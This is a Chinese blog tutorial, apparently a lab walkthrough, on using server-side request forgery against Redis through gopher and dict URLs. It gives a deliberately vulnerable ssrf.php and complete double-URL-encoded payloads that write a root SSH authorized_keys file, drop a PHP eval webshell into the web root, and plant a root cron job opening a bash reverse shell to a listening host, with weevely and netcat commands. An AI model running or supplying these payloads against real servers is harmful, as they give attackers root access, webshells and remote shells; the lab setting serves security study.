当前位置:首页 > CN2资讯 > 正文内容

怎样利用ssrf获取redis

3天前CN2资讯


ssrf+redis

  • 实验环境
    靶机:ubuntu16.04 ip:192.168.211.130
    在靶机中搭建lamp环境、安装redis、安装ssh
    攻击机:kali2020 ip:192.168.211.134
    在攻击机中安装redis
    vps:windows10(本机) ip:10.133.164.81
    在windows中安装nc.exe
  • 实验步骤
    1.将ssrf.php文件放在web根目录下
    ssrf.php:
<?php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_GET['url']); #curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, 0); #curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS); curl_exec($ch); curl_close($ch); ?>

2.通过攻击机访问靶机的ssrf.php,确定可以访问的通
http://192.168.211.130/ssrf.php?url=www.baidu.com
3.靶机中,进入redis安装目录,开启redis服务

redis-server redis.conf

攻击机中,进入redis安装目录,开启redis服务

redis-server redis.conf

4.在攻击机中测试

redis-cli -h 192.168.211.130


连接成功即两个redis可以互通

输入quit或exit退出

5.在浏览器中访问http://192.168.211.130/ssrf.php?url=127.0.0.1,出现如下图,可以判定存在ssrf漏洞


6.在浏览器中访问

http://192.168.211.130/ssrf.php?url=dict://127.0.0.1:6379/info,进行redis的默认端口6379进行访问,如下图,可以发现靶机上的redis服务

ssrf+redis攻击

7.在靶机上使用root权限新建一个

公钥存放目录.ssh

mkdir /root/.ssh

在攻击机中使用root权限新建一个
公钥存放目录.ssh

mkdir /root/.ssh

进入公钥存放目录,使用如下命令,生成ssh公钥和私钥:
在这里我密钥密码均设为空(也可以设为别的)

cd /root/.ssh ssh-keygen -t rsa


将公钥提取出来到ceshi.txt中,cat ceshi.txt查看公钥

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") >ceshi.txt cat ceshi.txt



8.通过URL访问SSRF漏洞地址:http://10.1.8.159/ssrf.php?url=

结合gother协议构造符合格式的paylod,从而模拟redis通信。

正常是在redis客户端和服务端连接通信时,payload如下:

set margin "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDr6sOA325MhcQUUknax18ZY9+I/t8LUzPqaD1eX/covADk/nbqcdohGhziCqNIicwdsSoSGu94Y1sauZfocDIIxsfvacFERhmjOXuO2MwxwBRjhblaMUnf3z/pWHjGC03olnkC7JzCIxydkoWRjuEZSbjYSvFvW70P0phyjQ6uYeBXZ32WWEB3iBDW7RGUI/UqmTYr5dWVnzbPsebNqVlCbfvBCGAGC3BmmZs2xoD8gFltru4BraBhMc3a5KCJrpuHVkC+5HxrzpTkFUIxIF2MgdC4XEtFgJUPyXE9kL94/Y/xgVtxFzeyYURPyN0PsLSgyJopIkSTQh/+/u+46MlXWZb+8LjdafSy9vglbiCir7u9rQGB8eqo8iBzfSZpDmJi0GqFJioWs5yF0guw06OEoC52cf8q2568zsdp8B4VBW1cSTPTaAdv9aEbn6qANLjigSIFMApW3eU5jEECawXts9Z7v9CfKd2Z3rHuIV4pl85emdv51fXyPiV1wf0m2zs= root@kali\n\n\n" config set dir /root/.ssh/ config set dbfilename "authorized_keys" save

将gother后面非字符内容进行URL编码

http://192.168.211.130/ssrf.php?url=gother://127.0.0.1:6379/_payload 转换为: http://192.168.211.130/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_payload

将以上命令构造成符合gother协议格式,且能够通过URL传输的格式来发送

将正常的payload进行两次URL编码构成新的payload

完整的访问网址

http://192.168.211.130/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%32%30%25%36%64%25%36%31%25%37%32%25%36%37%25%36%39%25%36%65%25%32%30%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%37%33%25%37%33%25%36%38%25%32%64%25%37%32%25%37%33%25%36%31%25%32%30%25%34%31%25%34%31%25%34%31%25%34%31%25%34%32%25%33%33%25%34%65%25%37%61%25%36%31%25%34%33%25%33%31%25%37%39%25%36%33%25%33%32%25%34%35%25%34%31%25%34%31%25%34%31%25%34%31%25%34%34%25%34%31%25%35%31%25%34%31%25%34%32%25%34%31%25%34%31%25%34%31%25%34%32%25%36%37%25%35%31%25%34%34%25%37%32%25%33%36%25%37%33%25%34%66%25%34%31%25%33%33%25%33%32%25%33%35%25%34%64%25%36%38%25%36%33%25%35%31%25%35%35%25%35%35%25%36%62%25%36%65%25%36%31%25%37%38%25%33%31%25%33%38%25%35%61%25%35%39%25%33%39%25%32%62%25%34%39%25%32%66%25%37%34%25%33%38%25%34%63%25%35%35%25%37%61%25%35%30%25%37%31%25%36%31%25%34%34%25%33%31%25%36%35%25%35%38%25%32%66%25%36%33%25%36%66%25%37%36%25%34%31%25%34%34%25%36%62%25%32%66%25%36%65%25%36%32%25%37%31%25%36%33%25%36%34%25%36%66%25%36%38%25%34%37%25%36%38%25%37%61%25%36%39%25%34%33%25%37%31%25%34%65%25%34%39%25%36%39%25%36%33%25%37%37%25%36%34%25%37%33%25%35%33%25%36%66%25%35%33%25%34%37%25%37%35%25%33%39%25%33%34%25%35%39%25%33%31%25%37%33%25%36%31%25%37%35%25%35%61%25%36%36%25%36%66%25%36%33%25%34%34%25%34%39%25%34%39%25%37%38%25%37%33%25%36%36%25%37%36%25%36%31%25%36%33%25%34%36%25%34%35%25%35%32%25%36%38%25%36%64%25%36%61%25%34%66%25%35%38%25%37%35%25%34%66%25%33%32%25%34%64%25%37%37%25%37%38%25%37%37%25%34%32%25%35%32%25%36%61%25%36%38%25%36%32%25%36%63%25%36%31%25%34%64%25%35%35%25%36%65%25%36%36%25%33%33%25%37%61%25%32%66%25%37%30%25%35%37%25%34%38%25%36%61%25%34%37%25%34%33%25%33%30%25%33%33%25%36%66%25%36%63%25%36%65%25%36%62%25%34%33%25%33%37%25%34%61%25%37%61%25%34%33%25%34%39%25%37%38%25%37%39%25%36%34%25%36%62%25%36%66%25%35%37%25%35%32%25%36%61%25%37%35%25%34%35%25%35%61%25%35%33%25%36%32%25%36%61%25%35%39%25%35%33%25%37%36%25%34%36%25%37%36%25%35%37%25%33%37%25%33%30%25%35%30%25%33%30%25%37%30%25%36%38%25%37%39%25%36%61%25%35%31%25%33%36%25%37%35%25%35%39%25%36%35%25%34%32%25%35%38%25%35%61%25%33%33%25%33%32%25%35%37%25%35%37%25%34%35%25%34%32%25%33%33%25%36%39%25%34%32%25%34%34%25%35%37%25%33%37%25%35%32%25%34%37%25%35%35%25%34%39%25%32%66%25%35%35%25%37%31%25%36%64%25%35%34%25%35%39%25%37%32%25%33%35%25%36%34%25%35%37%25%35%36%25%36%65%25%37%61%25%36%32%25%35%30%25%37%33%25%36%35%25%36%32%25%34%65%25%37%31%25%35%36%25%36%63%25%34%33%25%36%32%25%36%36%25%37%36%25%34%32%25%34%33%25%34%37%25%34%31%25%34%37%25%34%33%25%33%33%25%34%32%25%36%64%25%36%64%25%35%61%25%37%33%25%33%32%25%37%38%25%36%66%25%34%34%25%33%38%25%36%37%25%34%36%25%36%63%25%37%34%25%37%32%25%37%35%25%33%34%25%34%32%25%37%32%25%36%31%25%34%32%25%36%38%25%34%64%25%36%33%25%33%33%25%36%31%25%33%35%25%34%62%25%34%33%25%34%61%25%37%32%25%37%30%25%37%35%25%34%38%25%35%36%25%36%62%25%34%33%25%32%62%25%33%35%25%34%38%25%37%38%25%37%32%25%37%61%25%37%30%25%35%34%25%36%62%25%34%36%25%35%35%25%34%39%25%37%38%25%34%39%25%34%36%25%33%32%25%34%64%25%36%37%25%36%34%25%34%33%25%33%34%25%35%38%25%34%35%25%37%34%25%34%36%25%36%37%25%34%61%25%35%35%25%35%30%25%37%39%25%35%38%25%34%35%25%33%39%25%36%62%25%34%63%25%33%39%25%33%34%25%32%66%25%35%39%25%32%66%25%37%38%25%36%37%25%35%36%25%37%34%25%37%38%25%34%36%25%37%61%25%36%35%25%37%39%25%35%39%25%35%35%25%35%32%25%35%30%25%37%39%25%34%65%25%33%30%25%35%30%25%37%33%25%34%63%25%35%33%25%36%37%25%37%39%25%34%61%25%36%66%25%37%30%25%34%39%25%36%62%25%35%33%25%35%34%25%35%31%25%36%38%25%32%66%25%32%62%25%32%66%25%37%35%25%32%62%25%33%34%25%33%36%25%34%64%25%36%63%25%35%38%25%35%37%25%35%61%25%36%32%25%32%62%25%33%38%25%34%63%25%36%61%25%36%34%25%36%31%25%36%36%25%35%33%25%37%39%25%33%39%25%37%36%25%36%37%25%36%63%25%36%32%25%36%39%25%34%33%25%36%39%25%37%32%25%33%37%25%37%35%25%33%39%25%37%32%25%35%31%25%34%37%25%34%32%25%33%38%25%36%35%25%37%31%25%36%66%25%33%38%25%36%39%25%34%32%25%37%61%25%36%36%25%35%33%25%35%61%25%37%30%25%34%34%25%36%64%25%34%61%25%36%39%25%33%30%25%34%37%25%37%31%25%34%36%25%34%61%25%36%39%25%36%66%25%35%37%25%37%33%25%33%35%25%37%39%25%34%36%25%33%30%25%36%37%25%37%35%25%37%37%25%33%30%25%33%36%25%34%66%25%34%35%25%36%66%25%34%33%25%33%35%25%33%32%25%36%33%25%36%36%25%33%38%25%37%31%25%33%32%25%33%35%25%33%36%25%33%38%25%37%61%25%37%33%25%36%34%25%37%30%25%33%38%25%34%32%25%33%34%25%35%36%25%34%32%25%35%37%25%33%31%25%36%33%25%35%33%25%35%34%25%35%30%25%35%34%25%36%31%25%34%31%25%36%34%25%37%36%25%33%39%25%36%31%25%34%35%25%36%32%25%36%65%25%33%36%25%37%31%25%34%31%25%34%65%25%34%63%25%36%61%25%36%39%25%36%37%25%35%33%25%34%39%25%34%36%25%34%64%25%34%31%25%37%30%25%35%37%25%33%33%25%36%35%25%35%35%25%33%35%25%36%61%25%34%35%25%34%35%25%34%33%25%36%31%25%37%37%25%35%38%25%37%34%25%37%33%25%33%39%25%35%61%25%33%37%25%37%36%25%33%39%25%34%33%25%36%36%25%34%62%25%36%34%25%33%32%25%35%61%25%33%33%25%37%32%25%34%38%25%37%35%25%34%39%25%35%36%25%33%34%25%37%30%25%36%63%25%33%38%25%33%35%25%36%35%25%36%64%25%36%34%25%37%36%25%33%35%25%33%31%25%36%36%25%35%38%25%37%39%25%35%30%25%36%39%25%35%36%25%33%31%25%37%37%25%36%36%25%33%30%25%36%64%25%33%32%25%37%61%25%37%33%25%33%64%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%34%30%25%36%62%25%36%31%25%36%63%25%36%39%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%32%25%36%66%25%36%66%25%37%34%25%32%66%25%32%65%25%37%33%25%37%33%25%36%38%25%32%66%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%32%32%25%36%31%25%37%35%25%37%34%25%36%38%25%36%66%25%37%32%25%36%39%25%37%61%25%36%35%25%36%34%25%35%66%25%36%62%25%36%35%25%37%39%25%37%33%25%32%32%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35

9.直接在浏览器中访问
或者在攻击中执行命令

curl 完整网址

页面会显示超时,但还是吧公钥传入了.ssh中


这里由于我等待的时间比较长,就直接将公钥放入了.ssh中


10.在靶机中,开启ssh服务

systemctl restart sshd.service

在攻击机上使用ssh登陆靶机

ssh -i id_rsa [email protected]


但是这里没有免密登陆,我想应该是由于公钥是我复制过去的,而不是传过去的吧

但是最终也能登陆

输入ifconfig,可以查看到靶机的ip


向web中写入webshell

11.同理,将上面访问的网址的payload重新构造

原本的payload(即将一句话木马放入靶机的web根目录下):

set x "\n\n\n<?php @eval($_POST['redis']);?>\n\n\n" config set dir /var/www/html config set dbfilename shell.php save

完整的访问网址:

http://192.168.211.130/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%34%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%32%37%25%37%32%25%36%35%25%36%34%25%36%39%25%37%33%25%32%37%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%30%25%32%30%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%37%30%25%36%38%25%37%30%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35

这里,我直接通过kali(攻击机)的菜刀(weevely),生成一个1.php文件作为webshell
在kali中输入生成webshell,密码为password

weevely generate password /root/Desktop/1.php

如下图所示即够造完成


cat 1.php得到1.php内容

与上面构造payload一样
将这个webshell传入网站根目录
payload:

set x "\n\n\n这里为1.php的内容\n\n\n" config set dir /var/www/html config set dbfilename 1.php save

在进行两次URL编码形成完整的访问连接传入

http://192.168.211.130/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_这里为两次url编码后的内容

这里我直接将文件移动到靶机网站的根目录下


12.在攻击机中通过菜刀进行访问

weevely http://192.168.211.130/1.php password


输入dir查看根目录下文件,输入quit退出

有兴趣,也可以尝试上面的一句话木马,密码自己破解一下

计划反弹shell

13.windows 在nc安装目录下执行./nc.exe -lvp 6666 ,对6666端口进行监听

./nc.exe -lvp 6666

14.构造payload
正常的payload:

set xxx "\n\n* * * * * bash -i>& /dev/tcp/10.133.164.81/6666 0>&1\n\n" config set dir /var/spool/cron config set dbfilename root save

两次url编码后完整的访问网址

http://192.168.211.130/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%36%32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%64%25%36%39%25%33%65%25%32%36%25%32%30%25%32%66%25%36%34%25%36%35%25%37%36%25%32%66%25%37%34%25%36%33%25%37%30%25%32%66%25%33%31%25%33%30%25%32%65%25%33%31%25%33%33%25%33%33%25%32%65%25%33%31%25%33%36%25%33%34%25%32%65%25%33%38%25%33%31%25%32%66%25%33%36%25%33%36%25%33%36%25%33%36%25%32%30%25%33%30%25%33%65%25%32%36%25%33%31%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%33%25%37%30%25%36%66%25%36%66%25%36%63%25%32%66%25%36%33%25%37%32%25%36%66%25%36%65%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35

通过攻击机进行访问该网址,在Windows中进行监听,当监听到时,靶机中将会出现反弹的shell


    你可能想看:

    香港 SSR 节点分享:如何高效获取和使SSR节点

    解决微信小程序中Vue 3无法获取ref的问题

    Redis Java Client Comparison: Jedis vs Lettuce vs Redisson for Optimal Performance

    PixelExperience Magisk Root教程:轻松获取ROOT权限与自定义体验

    SSR机场试心得:如何选择与配置最适合你的SSR服务

    关于csrss.exe和winlogon.exe进程多、占CPU高的解决办法csrss.exe占cpu过高

    全面解析SSRF漏洞:定义、影响及防范策略

    服务器端请求伪造(SSRF)攻击及防范措施

    Optimize Circuit Timing with RC Tree: Essential Techniques to Reduce Delays and Boost Performance

    windows server2012怎样关机怎样重启-详细教程Windows server2012关机

    扫描二维码推送至手机访问。

    版权声明:本文由皇冠云发布,如需转载请注明出处。

    本文链接:https://www.idchg.com/info/19366.html

    标签: 怎样利用ssrf获取redisRedis
    分享给朋友:
    返回列表

    上一篇:MCjava怎么开作弊

    下一篇:在Docker下一键安装部署免费开源的问答社区!docker 一键安装

    “怎样利用ssrf获取redis” 的相关文章

    DMIT测试IP详解及VPS选择指南

    DMIT VPS服务概述 我对DMIT的了解始于他们在2017年的成立,作为一家海外VPS厂商,他们在市场上取得了显著的地位。DMIT提供的VPS服务覆盖多个地区,如中国香港、美国洛杉矶和日本东京。这些服务以对国内用户友好的优化路线而受到好评,尤其是CN2 GIA和CMIN2线路,这些线路减少了延迟...

    VPS优惠活动解析:如何选择最划算的虚拟专用服务器方案

    在当今互联网环境中,VPS(虚拟专用服务器)为企业和个人用户提供了灵活、高效的解决方案。随着云计算的普及,VPS逐渐成为许多用户的首选。不管是建站、开发、还是日常的数据处理,选择一款合适的VPS至关重要。而在不同的VPS服务提供商中,优惠活动往往能让用户以更实惠的价格体验高质量的服务。 什么是VPS...

    阿里云香港轻量服务器:高性价比云计算解决方案

    阿里云香港轻量服务器是我在寻找云计算解决方案时发现的一个非常实用的选择。它不仅具备高性价比,还有灵活的配置和便捷的管理体验,适合各种用户需求。让我带你深入了解一下这个产品的特点和优势。 首先,香港轻量服务器的价格设置比较合理。我看到它提供多个配置供用户选择,无论是新手还是有经验的开发者都能在这里找到...

    如何在Vultr上添加适合的充值金额和选择合适的VPS方案

    Vultr概述 Vultr是一家在云服务领域颇有声誉的公司,它以提供高性能的虚拟专用服务器(VPS)而闻名。Vultr不仅在全球范围内拥有多个数据中心,还以其灵活的方案和易于扩展的功能,赢得了众多用户的青睐。在激烈的市场竞争中,Vultr凭借其合理的价格和优化的服务流程,使自己脱颖而出,成为许多个人...

    BBR对国内网站的实际作用与应用效果分析

    BBR(Bottleneck Bandwidth and Round-trip propagation time)算法是由Google推出的一种TCP拥塞控制算法。它的设计初衷是为了优化网络连接的传输速率和稳定性,尤其是在面临高延迟和波动网络条件时表现优异。可能的很多朋友会问,BBR到底是个什么东西...

    国外VPS:高性价比虚拟专用服务器选择指南

    什么是国外VPS? 当我提到国外VPS时,它指的就是虚拟专用服务器(Virtual Private Server),这是一种把物理服务器分割成多个独立的小型服务器的技术。每一个VPS都拥有自己的公网IP地址和操作系统,资源如磁盘空间、内存和CPU都可以独立配置。这种固有的隔离性,可以让我在同一个物理...

    Copyright 皇冠云 Rights Reserved.